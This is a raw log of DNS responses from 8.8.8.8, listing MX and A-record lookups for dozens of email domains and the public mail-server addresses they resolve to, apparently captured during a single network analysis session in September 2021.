Sep 5, 2021 15:52:02.934165955 CEST	8.8.8.8	192.168.2.4	0x2d92	No error (0)	jeffersonbox.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:02.934165955 CEST	8.8.8.8	192.168.2.4	0x2d92	No error (0)	jeffersonbox.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:02.974942923 CEST	8.8.8.8	192.168.2.4	0x3587	No error (0)	mail01.jeffersonbox.com		161.156.29.45	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.622235060 CEST	8.8.8.8	192.168.2.4	0x9412	No error (0)	edgementoring.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:03.622235060 CEST	8.8.8.8	192.168.2.4	0x9412	No error (0)	edgementoring.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:03.622235060 CEST	8.8.8.8	192.168.2.4	0x9412	No error (0)	edgementoring.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:03.622235060 CEST	8.8.8.8	192.168.2.4	0x9412	No error (0)	edgementoring.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:03.622235060 CEST	8.8.8.8	192.168.2.4	0x9412	No error (0)	edgementoring.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:03.622235060 CEST	8.8.8.8	192.168.2.4	0x9412	No error (0)	edgementoring.org			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:03.681265116 CEST	8.8.8.8	192.168.2.4	0x32de	No error (0)	aspmx.l.google.com		108.177.119.26	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.693363905 CEST	8.8.8.8	192.168.2.4	0xa428	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.769462109 CEST	8.8.8.8	192.168.2.4	0x2aad	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.769462109 CEST	8.8.8.8	192.168.2.4	0x2aad	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.769462109 CEST	8.8.8.8	192.168.2.4	0x2aad	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.769462109 CEST	8.8.8.8	192.168.2.4	0x2aad	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.769462109 CEST	8.8.8.8	192.168.2.4	0x2aad	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.769462109 CEST	8.8.8.8	192.168.2.4	0x2aad	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.769462109 CEST	8.8.8.8	192.168.2.4	0x2aad	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:03.769462109 CEST	8.8.8.8	192.168.2.4	0x2aad	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.223524094 CEST	8.8.8.8	192.168.2.4	0xcc98	No error (0)	www.google.es		172.217.168.3	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.407911062 CEST	8.8.8.8	192.168.2.4	0xedd8	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.407911062 CEST	8.8.8.8	192.168.2.4	0xedd8	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.407911062 CEST	8.8.8.8	192.168.2.4	0xedd8	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.407911062 CEST	8.8.8.8	192.168.2.4	0xedd8	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.407911062 CEST	8.8.8.8	192.168.2.4	0xedd8	No error (0)	mta6.am0.yahoodns.net		67.195.204.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.407911062 CEST	8.8.8.8	192.168.2.4	0xedd8	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.407911062 CEST	8.8.8.8	192.168.2.4	0xedd8	No error (0)	mta6.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.407911062 CEST	8.8.8.8	192.168.2.4	0xedd8	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.511548996 CEST	8.8.8.8	192.168.2.4	0x7bce	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.511548996 CEST	8.8.8.8	192.168.2.4	0x7bce	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.511548996 CEST	8.8.8.8	192.168.2.4	0x7bce	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.511548996 CEST	8.8.8.8	192.168.2.4	0x7bce	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.511548996 CEST	8.8.8.8	192.168.2.4	0x7bce	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.511548996 CEST	8.8.8.8	192.168.2.4	0x7bce	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.511548996 CEST	8.8.8.8	192.168.2.4	0x7bce	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:04.511548996 CEST	8.8.8.8	192.168.2.4	0x7bce	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.101794958 CEST	8.8.8.8	192.168.2.4	0x6a3d	No error (0)	mhtn.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:05.172086954 CEST	8.8.8.8	192.168.2.4	0xb0be	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.188977957 CEST	8.8.8.8	192.168.2.4	0x24c0	No error (0)	mhtn-com.mail.protection.outlook.com		104.47.55.138	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.188977957 CEST	8.8.8.8	192.168.2.4	0x24c0	No error (0)	mhtn-com.mail.protection.outlook.com		104.47.59.138	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.339590073 CEST	8.8.8.8	192.168.2.4	0x5f2a	No error (0)	mx.lycos.de.cust.b.hostedemail.com		64.98.36.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.668150902 CEST	8.8.8.8	192.168.2.4	0x967e	No error (0)	emig.freenet.de		195.4.92.216	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.668150902 CEST	8.8.8.8	192.168.2.4	0x967e	No error (0)	emig.freenet.de		195.4.92.215	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.668150902 CEST	8.8.8.8	192.168.2.4	0x967e	No error (0)	emig.freenet.de		195.4.92.218	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.668150902 CEST	8.8.8.8	192.168.2.4	0x967e	No error (0)	emig.freenet.de		195.4.92.217	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.820580959 CEST	8.8.8.8	192.168.2.4	0xf988	No error (0)	emig.freenet.de		195.4.92.218	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.820580959 CEST	8.8.8.8	192.168.2.4	0xf988	No error (0)	emig.freenet.de		195.4.92.215	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.820580959 CEST	8.8.8.8	192.168.2.4	0xf988	No error (0)	emig.freenet.de		195.4.92.217	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.820580959 CEST	8.8.8.8	192.168.2.4	0xf988	No error (0)	emig.freenet.de		195.4.92.216	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:05.884047985 CEST	8.8.8.8	192.168.2.4	0xdced	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:06.163903952 CEST	8.8.8.8	192.168.2.4	0x56b0	No error (0)	mymdc.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.163903952 CEST	8.8.8.8	192.168.2.4	0x56b0	No error (0)	mymdc.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.163903952 CEST	8.8.8.8	192.168.2.4	0x56b0	No error (0)	mymdc.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.163903952 CEST	8.8.8.8	192.168.2.4	0x56b0	No error (0)	mymdc.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.163903952 CEST	8.8.8.8	192.168.2.4	0x56b0	No error (0)	mymdc.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.163903952 CEST	8.8.8.8	192.168.2.4	0x56b0	No error (0)	mymdc.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.163903952 CEST	8.8.8.8	192.168.2.4	0x56b0	No error (0)	mymdc.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.217550993 CEST	8.8.8.8	192.168.2.4	0xad35	No error (0)	alt2.aspmx.l.google.com		74.125.200.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:06.366791010 CEST	8.8.8.8	192.168.2.4	0x4a64	No error (0)	caribsurf.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.402870893 CEST	8.8.8.8	192.168.2.4	0x6153	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:06.423836946 CEST	8.8.8.8	192.168.2.4	0x4c97	No error (0)	mxin.upcmail.net		213.46.255.45	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:06.596416950 CEST	8.8.8.8	192.168.2.4	0x1a85	No error (0)	tiscalinet.it			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.596416950 CEST	8.8.8.8	192.168.2.4	0x1a85	No error (0)	tiscalinet.it			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.596416950 CEST	8.8.8.8	192.168.2.4	0x1a85	No error (0)	tiscalinet.it			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.596416950 CEST	8.8.8.8	192.168.2.4	0x1a85	No error (0)	tiscalinet.it			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.596416950 CEST	8.8.8.8	192.168.2.4	0x1a85	No error (0)	tiscalinet.it			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:06.648823977 CEST	8.8.8.8	192.168.2.4	0x7c12	No error (0)	etb-1.mail.tiscali.it		213.205.33.63	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:06.648823977 CEST	8.8.8.8	192.168.2.4	0x7c12	No error (0)	etb-1.mail.tiscali.it		213.205.33.62	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:06.648823977 CEST	8.8.8.8	192.168.2.4	0x7c12	No error (0)	etb-1.mail.tiscali.it		213.205.33.64	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:06.648823977 CEST	8.8.8.8	192.168.2.4	0x7c12	No error (0)	etb-1.mail.tiscali.it		213.205.33.61	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.387958050 CEST	8.8.8.8	192.168.2.4	0x4380	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.387958050 CEST	8.8.8.8	192.168.2.4	0x4380	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.387958050 CEST	8.8.8.8	192.168.2.4	0x4380	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.387958050 CEST	8.8.8.8	192.168.2.4	0x4380	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.387958050 CEST	8.8.8.8	192.168.2.4	0x4380	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.387958050 CEST	8.8.8.8	192.168.2.4	0x4380	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.387958050 CEST	8.8.8.8	192.168.2.4	0x4380	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.387958050 CEST	8.8.8.8	192.168.2.4	0x4380	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.548508883 CEST	8.8.8.8	192.168.2.4	0x4244	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.548508883 CEST	8.8.8.8	192.168.2.4	0x4244	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.548508883 CEST	8.8.8.8	192.168.2.4	0x4244	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.548508883 CEST	8.8.8.8	192.168.2.4	0x4244	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.548508883 CEST	8.8.8.8	192.168.2.4	0x4244	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.548508883 CEST	8.8.8.8	192.168.2.4	0x4244	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.548508883 CEST	8.8.8.8	192.168.2.4	0x4244	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.548508883 CEST	8.8.8.8	192.168.2.4	0x4244	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.619230986 CEST	8.8.8.8	192.168.2.4	0x6be3	No error (0)	erschools.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:07.619230986 CEST	8.8.8.8	192.168.2.4	0x6be3	No error (0)	erschools.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:07.619230986 CEST	8.8.8.8	192.168.2.4	0x6be3	No error (0)	erschools.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:07.619230986 CEST	8.8.8.8	192.168.2.4	0x6be3	No error (0)	erschools.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:07.619230986 CEST	8.8.8.8	192.168.2.4	0x6be3	No error (0)	erschools.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:07.665564060 CEST	8.8.8.8	192.168.2.4	0x730	No error (0)	aspmx.l.google.com		108.177.119.26	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.996423006 CEST	8.8.8.8	192.168.2.4	0xa316	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.996423006 CEST	8.8.8.8	192.168.2.4	0xa316	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.996423006 CEST	8.8.8.8	192.168.2.4	0xa316	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.996423006 CEST	8.8.8.8	192.168.2.4	0xa316	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.996423006 CEST	8.8.8.8	192.168.2.4	0xa316	No error (0)	mta6.am0.yahoodns.net		67.195.204.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.996423006 CEST	8.8.8.8	192.168.2.4	0xa316	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.996423006 CEST	8.8.8.8	192.168.2.4	0xa316	No error (0)	mta6.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:07.996423006 CEST	8.8.8.8	192.168.2.4	0xa316	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:08.151364088 CEST	8.8.8.8	192.168.2.4	0x2f3c	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:08.532814026 CEST	8.8.8.8	192.168.2.4	0xc1e8	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.316310883 CEST	8.8.8.8	192.168.2.4	0x87fb	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.316310883 CEST	8.8.8.8	192.168.2.4	0x87fb	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.316310883 CEST	8.8.8.8	192.168.2.4	0x87fb	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.316310883 CEST	8.8.8.8	192.168.2.4	0x87fb	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.316310883 CEST	8.8.8.8	192.168.2.4	0x87fb	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.316310883 CEST	8.8.8.8	192.168.2.4	0x87fb	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.316310883 CEST	8.8.8.8	192.168.2.4	0x87fb	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.316310883 CEST	8.8.8.8	192.168.2.4	0x87fb	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.504376888 CEST	8.8.8.8	192.168.2.4	0x396e	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.783606052 CEST	8.8.8.8	192.168.2.4	0x18ee	No error (0)	onlinehome.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:09.783606052 CEST	8.8.8.8	192.168.2.4	0x18ee	No error (0)	onlinehome.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:09.832238913 CEST	8.8.8.8	192.168.2.4	0xd34f	No error (0)	mx00.emig.kundenserver.de		212.227.15.40	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.941261053 CEST	8.8.8.8	192.168.2.4	0x926e	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:09.990993023 CEST	8.8.8.8	192.168.2.4	0x56c0	No error (0)	sr-mainz.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:10.048799992 CEST	8.8.8.8	192.168.2.4	0x4749	No error (0)	hosting.next-provider.net		5.9.84.182	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:10.398056030 CEST	8.8.8.8	192.168.2.4	0xbaca	No error (0)	stbfendrich.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:10.398056030 CEST	8.8.8.8	192.168.2.4	0xbaca	No error (0)	stbfendrich.de			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:10.455466032 CEST	8.8.8.8	192.168.2.4	0xbb60	No error (0)	mx00.kundenserver.de		212.227.15.41	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:10.552969933 CEST	8.8.8.8	192.168.2.4	0x3ea6	No error (0)	gmqil.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:10.600231886 CEST	8.8.8.8	192.168.2.4	0x293c	No error (0)	park-mx.above.com		103.224.212.34	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:10.607625961 CEST	8.8.8.8	192.168.2.4	0x90cb	No error (0)	mx00.t-online.de		194.25.134.8	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:10.715260983 CEST	8.8.8.8	192.168.2.4	0xb73	No error (0)	mx00.t-online.de		194.25.134.8	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:10.983701944 CEST	8.8.8.8	192.168.2.4	0xe66b	No error (0)	netzero.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:10.983701944 CEST	8.8.8.8	192.168.2.4	0xe66b	No error (0)	netzero.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:11.024713039 CEST	8.8.8.8	192.168.2.4	0x49b6	No error (0)	mx.vgs.untd.com		64.136.52.37	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.120419979 CEST	8.8.8.8	192.168.2.4	0x7cb7	No error (0)	netscape.net			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:11.161214113 CEST	8.8.8.8	192.168.2.4	0x282	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.86	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.161214113 CEST	8.8.8.8	192.168.2.4	0x282	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.93	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.161214113 CEST	8.8.8.8	192.168.2.4	0x282	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.80	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.161214113 CEST	8.8.8.8	192.168.2.4	0x282	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.204.75	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.161214113 CEST	8.8.8.8	192.168.2.4	0x282	No error (0)	mx-aol.mail.gm0.yahoodns.net		98.136.96.92	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.161214113 CEST	8.8.8.8	192.168.2.4	0x282	No error (0)	mx-aol.mail.gm0.yahoodns.net		67.195.228.84	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.228283882 CEST	8.8.8.8	192.168.2.4	0x8ed5	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.228283882 CEST	8.8.8.8	192.168.2.4	0x8ed5	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.228283882 CEST	8.8.8.8	192.168.2.4	0x8ed5	No error (0)	mta6.am0.yahoodns.net		98.136.96.76	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.228283882 CEST	8.8.8.8	192.168.2.4	0x8ed5	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.228283882 CEST	8.8.8.8	192.168.2.4	0x8ed5	No error (0)	mta6.am0.yahoodns.net		67.195.204.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.228283882 CEST	8.8.8.8	192.168.2.4	0x8ed5	No error (0)	mta6.am0.yahoodns.net		67.195.228.106	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.228283882 CEST	8.8.8.8	192.168.2.4	0x8ed5	No error (0)	mta6.am0.yahoodns.net		67.195.204.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.228283882 CEST	8.8.8.8	192.168.2.4	0x8ed5	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:11.795875072 CEST	8.8.8.8	192.168.2.4	0x368	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.019787073 CEST	8.8.8.8	192.168.2.4	0x4864	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.289630890 CEST	8.8.8.8	192.168.2.4	0xc68f	No error (0)	whitehouseautomall.com			MX (Mail exchange)	IN (0x0001)
Sep 5, 2021 15:52:12.345843077 CEST	8.8.8.8	192.168.2.4	0x8362	No error (0)	mail.h-email.net		54.190.26.211	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.345843077 CEST	8.8.8.8	192.168.2.4	0x8362	No error (0)	mail.h-email.net		54.244.49.115	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.345843077 CEST	8.8.8.8	192.168.2.4	0x8362	No error (0)	mail.h-email.net		34.223.6.127	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.345843077 CEST	8.8.8.8	192.168.2.4	0x8362	No error (0)	mail.h-email.net		18.237.235.220	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.345843077 CEST	8.8.8.8	192.168.2.4	0x8362	No error (0)	mail.h-email.net		54.200.93.251	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.345843077 CEST	8.8.8.8	192.168.2.4	0x8362	No error (0)	mail.h-email.net		34.212.139.205	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.345843077 CEST	8.8.8.8	192.168.2.4	0x8362	No error (0)	mail.h-email.net		34.212.36.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.345843077 CEST	8.8.8.8	192.168.2.4	0x8362	No error (0)	mail.h-email.net		54.187.110.113	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.345843077 CEST	8.8.8.8	192.168.2.4	0x8362	No error (0)	mail.h-email.net		34.222.93.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.345843077 CEST	8.8.8.8	192.168.2.4	0x8362	No error (0)	mail.h-email.net		34.220.245.67	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.485016108 CEST	8.8.8.8	192.168.2.4	0xe33f	No error (0)	mx.lycos.de.cust.b.hostedemail.com		64.98.36.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.699079990 CEST	8.8.8.8	192.168.2.4	0x13e3	No error (0)	alt1.gmail-smtp-in.l.google.com		142.250.150.27	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.810723066 CEST	8.8.8.8	192.168.2.4	0xb281	No error (0)	al-ip4-mx-vip2.prodigy.net		144.160.235.144	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.938776970 CEST	8.8.8.8	192.168.2.4	0x8bc7	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.938776970 CEST	8.8.8.8	192.168.2.4	0x8bc7	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.938776970 CEST	8.8.8.8	192.168.2.4	0x8bc7	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.938776970 CEST	8.8.8.8	192.168.2.4	0x8bc7	No error (0)	mta6.am0.yahoodns.net		67.195.204.73	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.938776970 CEST	8.8.8.8	192.168.2.4	0x8bc7	No error (0)	mta6.am0.yahoodns.net		67.195.228.111	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.938776970 CEST	8.8.8.8	192.168.2.4	0x8bc7	No error (0)	mta6.am0.yahoodns.net		67.195.228.94	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.938776970 CEST	8.8.8.8	192.168.2.4	0x8bc7	No error (0)	mta6.am0.yahoodns.net		67.195.228.110	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:12.938776970 CEST	8.8.8.8	192.168.2.4	0x8bc7	No error (0)	mta6.am0.yahoodns.net		67.195.204.79	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.486779928 CEST	8.8.8.8	192.168.2.4	0xb5e8	No error (0)	mx.lycos.de.cust.b.hostedemail.com		64.98.36.4	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.542862892 CEST	8.8.8.8	192.168.2.4	0x59bc	No error (0)	mta6.am0.yahoodns.net		98.136.96.91	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.542862892 CEST	8.8.8.8	192.168.2.4	0x59bc	No error (0)	mta6.am0.yahoodns.net		98.136.96.74	A (IP address)	IN (0x0001)
Sep 5, 2021 15:52:13.542862892 CEST	8.8.8.8	192.168.2.4	0x59bc	No error (0)	mta6.am0.yahoodns.net		98.136.96.77	A (IP address)	IN (0x0001)
